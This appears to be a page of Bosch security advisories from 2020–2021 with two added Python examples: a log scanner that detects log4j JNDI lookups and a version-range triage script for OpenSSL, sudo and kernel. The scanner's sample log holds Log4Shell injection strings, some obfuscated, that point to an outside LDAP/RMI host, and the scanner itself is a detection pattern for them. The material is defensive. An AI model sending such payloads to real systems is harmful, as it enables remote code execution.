December 2021
Title
Apache Log4j Vulnerabilities - Impact on Bosch Rexroth Products
Published
Dec. 21, 2021, 1 a.m.
Summary

BOSCH-SA-572602: The Apache Software Foundation has published information about a vulnerability in the Java logging framework *log4j*, which allows an attacker to execute arbitrary code loaded from LDAP or JNDI related endpoints which are under control of the attacker. [1] Additionally, a further vulnerability might allow an attacker to cause a ...
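
The lookup mechanism described in this advisory leaves a recognisable trace in any logged, attacker-controlled string: a `${jndi:<scheme>://...}` expression. The following is an added example (not Bosch's code and not part of the original page) of a small log scanner for that pattern. It also unwraps the nested `${lower:...}` / `${...:-x}` lookup forms that were used to evade naive string matching; those obfuscation forms are an assumption added for the example, the advisory itself only describes the plain lookup. The log lines and the 203.0.113.0/24 addresses are constructed sample data.

```python
import re

# Obfuscation forms (assumed for this example, not taken from the advisory):
#   ${lower:j} / ${upper:J}   -> "j"
#   ${env:NOPE:-j} / ${::-j}  -> "j"   (default-value syntax, lookup name ignored)
_LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The actual JNDI lookup the advisory describes; scheme list is an assumption.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE
)


def normalize(text: str) -> str:
    """Collapse innermost lookups until the string stops changing.

    Replacing inner ${lower:x} / ${...:-x} expressions by their literal value turns
    "${${lower:j}ndi:...}" into "${jndi:...}", so one regex can then detect it.
    """
    prev = None
    while prev != text:
        prev = text
        text = _LOWER_UPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(line: str):
    """Return the lower-cased JNDI schemes found in one log line after de-obfuscation."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]


def scan(lines):
    """Return (line index, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        for scheme in find_jndi_lookups(line):
            hits.append((i, scheme))
    return hits


SAMPLE_LOG = [  # constructed for this example; 203.0.113.0/24 is a documentation range
    'GET /index.jsp HTTP/1.1 200 "Mozilla/5.0"',
    "User-Agent: ${jndi:ldap://203.0.113.10:1389/a}",
    "X-Api-Version: ${${lower:j}ndi:${lower:rmi}://203.0.113.10:1099/x}",
    "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10/x}",
    "Referer: ${JnDi:DNS://203.0.113.10/probe}",
    "order ${date:yyyy-MM-dd} processed",  # benign lookup, must not match
]

if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LOG):
        print(f"line {idx}: JNDI lookup via {scheme}: {SAMPLE_LOG[idx]}")
```

Running the scanner over access or application logs only tells you that lookup strings reached the logger; whether they were evaluated depends on the log4j version and configuration on the host, which is what the advisory's affected-product list answers.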

Title
Multiple Vulnerabilities in Bosch BT software products
Published
Dec. 8, 2021, 1 a.m.
Summary

BOSCH-SA-043434-BT: A recently discovered security vulnerability allows an unauthenticated attacker to cause an application to crash (Denial of Service / DoS) and, for the VRM, opens the possibility to send unauthenticated commands for a short time (this vulnerability is rated critical). The VRM, DIVAR IP and BVMS with VRM are also ...

October 2021
Title
Multiple vulnerabilities in Rexroth IndraMotion and IndraLogic series
Published
Oct. 4, 2021, 2 a.m.
Summary

BOSCH-SA-741752: The control systems series Rexroth IndraMotion MLC and IndraLogic XLC are affected by multiple vulnerabilities in the web server, which – in combination – ultimately enable an attacker to log in to the system. - Information disclosure: The main configuration, including users and their hashed passwords, is exposed by ...

August 2021
Title
Cross Site Request Forgery (CSRF) vulnerability in Bosch IP cameras
Published
Aug. 4, 2021, 2 a.m.
Summary

BOSCH-SA-033305-BT: The possibility to conduct a CSRF (Cross Site Request Forgery) attack was discovered in a Penetration Test from Kaspersky ICS CERT during a certification effort from Bosch. Bosch rates this vulnerability with CVSSv3.1 base scores of 7.5 (High), where the actual rating depends on the final rating specific to ...

July 2021
Title
Vulnerabilities in CODESYS V2 runtime systems
Published
July 20, 2021, 2 a.m.
Summary

BOSCH-SA-670099: The compact systems CS351E and CS351S and the communication module KE350G with integrated PLC contain technology from CODESYS GmbH. The manufacturer CODESYS GmbH published security bulletins [1][2] about a weakness in the protocol for the communication between the PLC runtime and clients. By exploiting these vulnerabilities, attackers can send ...

June 2021
Title
Multiple vulnerabilities in Bosch IP cameras
Published
June 9, 2021, 2 a.m.
Summary

BOSCH-SA-478243-BT: Multiple vulnerabilities for Bosch IP cameras have been discovered in a Penetration Test from Kaspersky ICS CERT during a certification effort from Bosch. Bosch rates these vulnerabilities with CVSSv3.1 base scores from 9.8 (Critical) to 4.9 (Medium), where the actual rating depends on the individual vulnerability and the final ...

May 2021
Title
Several Vulnerabilities in Bosch B426, B426-CN/B429-CN, and B426-M
Published
May 28, 2021, 2 a.m.
Summary

BOSCH-SA-196933-BT: A security vulnerability affects the Bosch B426, B426-CN/B429-CN, and B426-M. The vulnerability is exploitable via the network interface. Bosch rates this vulnerability at 8.0 (High) and recommends that customers update vulnerable components to fixed software versions. A second vulnerable condition was found when using the http protocol, in which the ...

Title
Vulnerability in the routing protocol of the PLC runtime
Published
May 19, 2021, 2 a.m.
Summary

BOSCH-SA-350374: The control systems IndraMotion MTX, MLC and MLD and the ctrlX CORE PLC application contain PLC technology from Codesys GmbH. The manufacturer Codesys GmbH published a security bulletin [1] about a weakness in the routing protocol for the communication between the PLC runtime and clients. By exploiting the vulnerability, ...

April 2021
Title
FTP Backdoor for Rexroth Fieldbus Couplers S20 and Inline
Published
April 30, 2021, 2 a.m.
Summary

BOSCH-SA-428397: On some Fieldbus Couplers, there is a hidden, password-protected FTP area for the root directory.

Title
ctrlX CORE - IDE App affected by OpenSSL and Python Vulnerabilities
Published
April 30, 2021, 2 a.m.
Summary

BOSCH-SA-017743: Multiple vulnerabilities affecting OpenSSL versions prior to 1.1.1k and Python 0 through 3.9.1 have been reported. Affected versions are included in the ctrlX CORE - IDE App. In order to successfully exploit these vulnerabilities, an attacker requires access to the network or system. Two vulnerabilities (CVE-2021-3177 and CVE-2021-27619) are ...

Title
ctrlX Multiple Vulnerabilities
Published
April 23, 2021, 2 a.m.
Summary

Multiple vulnerabilities in operating system libraries and the Linux kernel have been reported which in a worst case scenario could allow an attacker to compromise the system by provoking a crash or the execution of malicious code. The affected functions are not used directly by any Rexroth software component and ...

March 2021
Title
Denial of Service in Rexroth ActiveMover using EtherNet/IP protocol
Published
March 31, 2021, 2 a.m.
Summary

BOSCH-SA-282922: The ActiveMover with the EtherNet/IP communication module (Rexroth no. 3842 559 444) sold by Bosch Rexroth contains communication technology from Hilscher (EtherNet/IP Core V2) in which a vulnerability with high severity has been discovered. A denial of service and memory corruption vulnerability could allow arbitrary code to be injected ...

Title
Denial of Service in Rexroth ActiveMover using Profinet protocol
Published
March 31, 2021, 2 a.m.
Summary

BOSCH-SA-637429: The ActiveMover with Profinet communication module (Rexroth no. 3842 559 445) sold by Bosch Rexroth contains communication technology from Hilscher (PROFINET IO Device V3) in which a vulnerability with high severity has been discovered. A Denial of Service vulnerability may lead to unexpected loss of cyclic communication or interruption ...

Title
Uncontrolled Search Path Element in Multiple Bosch Products
Published
March 24, 2021, 1 a.m.
Summary

BOSCH-SA-835563-BT: Multiple Bosch software applications are affected by a security vulnerability, which potentially allows an attacker to load additional code in the form of DLLs (commonly known as "DLL Hijacking" or "DLL Preloading"). This code is executed during the start of the vulnerable application and in the context of the ...

Title
Side Channel Key Extraction Vulnerability in Bosch IP Cameras and Encoders
Published
March 2, 2021, 1 a.m.
Summary

BOSCH-SA-762869-BT: A recently discovered side channel attack for the NXP P5x security microcontrollers was made public. It allows attackers to extract an ECDSA private key after extensive physical access to the chip. The P5x is used as secure certificate storage on Bosch cameras and encoders built on platforms CPP-ENC CPP3 ...

February 2021
Title
Privilege Escalation via sudo and Linux kernel in Bosch Rexroth Products
Published
Feb. 24, 2021, 1 a.m.
Summary

BOSCH-SA-372917: Linux kernel versions through 5.10.11 contain weaknesses which allow local users to execute code in the kernel with the potential to escalate privileges [1][2]. In versions of sudo before 1.9.5p2 there is a weakness present which allows privilege escalation to root for local users [3]. The ctrlX CORE and ...

January 2021
Title
Denial of Service in Rexroth ID 200/C-ETH using EtherNet/IP Protocol
Published
Jan. 27, 2021, 1 a.m.
Summary

BOSCH-SA-775371: The ID 200/C-ETH (Rexroth No. 3842 410 060) sold by Bosch Rexroth contains communication technology (499ES EtherNet/IP) from Real Time Automation (RTA) in which a critical vulnerability has been discovered. By exploiting the vulnerability an attacker can send a specially crafted packet that may result in a denial-of-service condition ...

Title
Two Vulnerabilities in Bosch Fire Monitoring System (FSM)
Published
Jan. 21, 2021, 1 a.m.
Summary

BOSCH-SA-332072-BT: Two vulnerabilities have been discovered affecting the Bosch Fire Monitoring System (FSM-2500 and FSM-5000). The critical issue applies to FSM systems with versions 5.2 and lower. Bosch rates these vulnerabilities with CVSS v3.1 Base Scores of 4.4 and 10.0 (medium and critical) and strongly recommends that customers update ...

December 2020
Title
ctrlX Products affected by OpenSSL Vulnerability CVE-2020-1971
Published
Dec. 18, 2020, 1 a.m.
Summary

BOSCH-SA-274557: The OpenSSL Software Foundation has published information [1] for OpenSSL versions prior to 1.1.1i (1.1.1 – 1.1.1h) and 1.0.2x (1.0.2 – 1.0.2w) regarding a weakness in the `GENERAL_NAME_cmp` function. The vulnerability could allow an attacker to provoke a null pointer dereference, potentially leading to a denial of service. Multiple ...
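
The advisory above and the sudo/kernel advisory BOSCH-SA-372917 (February 2021) both define "affected" purely by version range, and each component uses its own version convention: OpenSSL 1.x appends a patch letter (1.1.1h is older than 1.1.1i), sudo appends a `pN` patch level (1.9.5p1 is older than 1.9.5p2), and the kernel uses a plain dotted number. Comparing such strings lexically gets this wrong, so the following added example (not Bosch's code and not part of the original page) parses each scheme into comparable tuples and checks an inventory against the ranges transcribed from the two advisories. Host names and versions in the inventory are constructed sample data.

```python
import re


def parse_openssl(version: str):
    """'1.1.1h' -> (1, 1, 1, 8).  OpenSSL 1.x patch releases are letters:
    '' = 0, 'a' = 1 ... 'z' = 26, 'za' = 27 (summing letters handles the 'z?' form)."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)([a-z]*)", version.strip())
    if not m:
        raise ValueError(f"not an OpenSSL 1.x version string: {version!r}")
    patch = sum(ord(c) - ord("a") + 1 for c in m.group(4))
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), patch)


def parse_sudo(version: str):
    """'1.9.5p2' -> (1, 9, 5, 2); sudo marks patch levels with a 'pN' suffix."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", version.strip())
    if not m:
        raise ValueError(f"not a sudo version string: {version!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4) or 0))


def parse_kernel(version: str):
    """'5.10.11' -> (5, 10, 11); '5.4.0-65-generic' -> (5, 4, 0).
    Distribution suffixes are ignored (see the usage note on backports)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"not a kernel version string: {version!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


# Affected ranges as [lower inclusive, upper exclusive) tuples, transcribed from
# BOSCH-SA-274557 (OpenSSL) and BOSCH-SA-372917 (sudo, kernel).  The fixed
# version is the exclusive upper bound.
AFFECTED = {
    "openssl": (parse_openssl, [((1, 1, 1, 0), parse_openssl("1.1.1i")),   # 1.1.1 - 1.1.1h
                                ((1, 0, 2, 0), parse_openssl("1.0.2x"))]),  # 1.0.2 - 1.0.2w
    "sudo":    (parse_sudo,    [((0, 0, 0, 0), parse_sudo("1.9.5p2"))]),    # before 1.9.5p2
    "kernel":  (parse_kernel,  [((0, 0, 0),    (5, 10, 12))]),              # through 5.10.11
}


def is_affected(product: str, version: str) -> bool:
    """True when `version` lies inside an affected range listed for `product`.

    A version outside every listed range (e.g. OpenSSL 1.1.0, which the advisory
    does not mention) returns False: that means "not assessed here", not "safe".
    """
    parser, ranges = AFFECTED[product]
    v = parser(version)
    return any(lo <= v < hi for lo, hi in ranges)


def triage(inventory):
    """Return the (host, product, version) entries that need an update."""
    return [(h, p, ver) for h, p, ver in inventory if is_affected(p, ver)]


INVENTORY = [  # constructed sample; hosts and versions are illustrative
    ("ctrlx-01", "openssl", "1.1.1h"),
    ("ctrlx-02", "openssl", "1.1.1i"),
    ("ipc-legacy", "openssl", "1.0.2u"),
    ("ctrlx-01", "sudo", "1.9.5p1"),
    ("ctrlx-02", "sudo", "1.9.5p2"),
    ("ctrlx-01", "kernel", "5.10.11"),
    ("ctrlx-02", "kernel", "5.10.12"),
    ("build-box", "kernel", "5.4.0-65-generic"),
]

if __name__ == "__main__":
    for host, product, version in triage(INVENTORY):
        print(f"{host}: {product} {version} is in an affected range; update required")
```

Treat the result as a screening list, not a verdict: Linux distributions routinely backport a fix without changing the upstream version number (a distribution kernel or sudo package can carry the fix while still reporting an "affected" version), and for the ctrlX and IndraMotion products the authoritative answer is the fixed firmware or app version named in the advisory, not the embedded library version.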

Title
Denial of Service in PLC Runtime affecting Rexroth IndraMotion Products
Published
Dec. 16, 2020, 1 a.m.
Summary

BOSCH-SA-152060: The control systems IndraMotion MTX, MLC and MLD sold by Bosch Rexroth contain technology from CODESYS GmbH. The manufacturer published security bulletins [1], [2] about weaknesses in the communication interface of the PLC runtime. By exploiting these vulnerabilities, the control device can be put into a state in which ...

Title
Multiple Vulnerabilities in 3S CODESYS Runtime in Rexroth PRC7000
Published
Dec. 16, 2020, 1 a.m.
Summary

BOSCH-SA-387388: The PRC7000 welding timer sold by Bosch Rexroth AG contains a CODESYS Soft-PLC Runtime from 3S. The manufacturer published security reports [1] about several weaknesses. By exploiting those weaknesses, an attacker can cause denial-of-service conditions or acquire user credentials. The vulnerabilities affect all firmware versions up to 1.11.3, and ...

October 2020
Title
Remote Desktop Services Remote Code Execution Vulnerability in Rexroth Industrial PCs
Published
Oct. 13, 2020, 2 a.m.
Summary

BOSCH-SA-856281: Microsoft has published information [1] for several versions of Microsoft Windows XP, Microsoft Windows XP Embedded, Microsoft Windows 7 and Microsoft Windows 7 Embedded Standard regarding a vulnerability in the Remote Desktop Service. The vulnerability could allow an unauthenticated remote attacker to execute arbitrary code on the target system ...

September 2020
Title
Vulnerabilities in Bosch PRAESIDEO and PRAESENSA
Published
Sept. 28, 2020, 2 a.m.
Summary

BOSCH-SA-538331-BT: Two security vulnerabilities have been uncovered in the web based management interface of the PRAESIDEO Network Controller and the PRAESENSA System Controller. The vulnerabilities will allow a Cross-Site Request Forgery (CSRF) attack and a Cross-site Scripting (XSS) attack. For PRAESIDEO a third vulnerability will allow a replay attack with ...

Title
WIBU Systems CodeMeter Runtime Vulnerabilities in Rexroth Products
Published
Sept. 25, 2020, 2 a.m.
Summary

BOSCH-SA-231483: A set of 6 vulnerabilities affect multiple versions of the WIBU Systems CodeMeter Runtime Software. This software is used by multiple Rexroth Products and Bosch Rexroth customers for license management. In order to successfully exploit these vulnerabilities an attacker requires access to the network or system. One vulnerability (CVE-2020-14509) ...

August 2020
Title
Improper Certificate Validation in Bosch Smart Home System App for iOS
Published
Aug. 24, 2020, 2 a.m.
Summary

BOSCH-SA-347336: A recently discovered security vulnerability affects the Bosch Smart Home System App for iOS. Both Bosch Smart Home Camera Apps as well as the Bosch Smart Home System App for Android are not affected. It potentially allows to intercept video contents by performing a man-in-the-middle attack. Since only connections ...
